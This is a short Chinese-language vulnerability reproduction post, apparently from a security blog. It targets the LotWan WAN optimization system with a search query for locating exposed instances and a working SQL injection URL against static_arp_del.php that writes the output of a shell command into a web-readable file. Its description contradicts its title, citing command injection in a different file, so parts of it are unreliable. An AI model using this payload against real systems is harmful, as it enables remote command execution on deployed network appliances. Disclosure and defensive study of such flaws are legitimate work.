华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞

漏洞描述

华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接,导致远程命令执行漏洞。

漏洞影响

华夏创新 LotWan广域网优化系统

网络测绘

title=”LotWan 广域网优化系统”

漏洞复现

登录页面

20240327110744164-1635942598942-6671fa50-5052-43f6-ab40-bf2c8403bdf8.cd406953_2024-03-27_11-07-25 (1)

存在漏洞的文件为 static_arp_del.php, 通过union注入写入文件

/acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8--

再访问 /acc/bindipmac/cmd.txt

20240327110922592-1635944083151-f56d838d-54e4-4d28-a6ac-6e079e936cf3.7d2c606f_2024-03-27_11-09-03 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容